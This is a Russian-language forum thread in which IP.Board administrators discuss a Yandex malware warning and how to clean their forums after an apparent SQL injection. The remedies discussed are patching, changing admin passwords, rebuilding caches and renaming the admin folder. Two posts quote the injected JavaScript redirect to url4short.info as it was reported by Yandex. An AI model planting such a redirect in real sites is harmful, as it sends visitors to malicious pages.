Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
Karagor

Яндекс обнаружил вредоносный код на форуме

Рекомендованные сообщения

Так а как найти вирус?

Поделиться сообщением


Ссылка на сообщение
они для 3.1.х, 3.2.х и 3.4.х, а у меня 3.4.х

Где вы там уведели прошлогодний патч для 3.1x? Поддержка этой версии закончилась три года назад.

http://ipbskins.ru/forum/topic13571.html#entry89862 (патч от 9 Ноября 2014) и все последующие патчи.

 

Так а как найти вирус?

Какой вирус?

В отчете айболита ничего подозрительного нету.

Поделиться сообщением


Ссылка на сообщение

Странно, Яндекс.Вебмастер об угрозах молчит

Странно было если бы форум был заражен а яндекс молчал. В противном случае скорее всего форум чист. Возможно не успели или не смогли расшифровать хеш пароля, либо при входе в АЦ стоит дополнительная авторизация, а без доступа в админцентр встроить вредоносный код намного сложнее.

Поделиться сообщением


Ссылка на сообщение

В отчете айболита ничего подозрительного нету.

 

Так значит беспокоится не о чем. А как же sql_latest_error.cgi? Просто поставить патч и всё?

Поделиться сообщением


Ссылка на сообщение
А как же sql_latest_error.cgi? Просто поставить патч и всё?

Ошибка в sql логе говорит о том, что на форуме проводилась sql инъекция которая позволяет получить произвольный доступ к данным форума, к таким как ключ авторизации, хеш пароля и прочим. Имея эти данные злоумышленник, расшифровав хеш, может авторизоваться на форуме под любой учетной записью имеющей доступ в АЦ. Отсюда надеюсь понятно, что одними патчами уже нельзя обойтись. Следует также сменить все пароли администраторов (с обязательным сбросом ключа авторизации), чьи хеши скомпрометированы и которыми злоумышленник может воспользоваться. Получить конфиденциальные данные это тоже считается взломом, не только дефейс или инфицирование сайта.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

Здравствуйте! Перечитал всю тему. Просканировал манулом, но вредоносного кода не обнаружил, при этом ТП яндекс прислал письмо

"К сожалению, на Вашем сайте повторно появился указанный ниже вредоносный код:

 

document.location='http://url4short.info/c64bad21'

 

при подгрузке следующего url:

 

autopaty.com.ua/index.php?ipbv=9fea7de314a3082c69f1615e16d6b1c8&g=js

 

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код."

Поделиться сообщением


Ссылка на сообщение

Не знаю каким образом вы перечитали всю тему, потому что лечение от этого вируса обсуждалось здесь стопиццот раз прямо со второго сообщения. Я не услышал ни одного конкретного пункта который вы должно были проделать, а для эффективного лечения их нужно выполнить все. Попробуйте еще раз перечитать тему, и на этот раз вникать в суть написанного. Не получается - обращайтесь к услугам специалистов, мы всегда будем рады вам помочь.

Поделиться сообщением


Ссылка на сообщение

Быстро просканировав сайт скриптом от siv1987

 

Получил такой результат:

 

От яндекса получил такое письмо:

На Вашем сайте периодически появляется указанный ниже вредоносный код: document.location='http://url4short.info/62decc30' при подгрузке следующего url: nlc-zone.ru/forum/public/min/index.php?ipbv=b7af755633926f5a00313de81c8c7342&g=js

 

1. Кеш стилей и языков обновил

2. пароли сменил

3. отключил сжатие JS / CSS

 

Окромя того что нашел scan.php нигде ничего нет :(

Поделиться сообщением


Ссылка на сообщение
Быстро просканировав сайт скриптом от siv1987

Этот скрипт не предназначен для поиска вирусов и лишь служит для быстрого поиска некоторых функций используемых в бэкдорах. Для поиска вирусов используйте специализированые скрипты и по.

 

 

Окромя того что нашел scan.php нигде ничего нет

Если вы проделали все пункты - дайте на перепроверку и ждите результат.

Сжатие css не имеет никакого отношения, не знаю откуда вы это взяли, а вот обновления безопасности ставить нужно, иначе все остальное будет бесполезно.

Поделиться сообщением


Ссылка на сообщение

Все решилось перестроением кешей стилей, сменой паролей и переименовыванием папки admin.

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...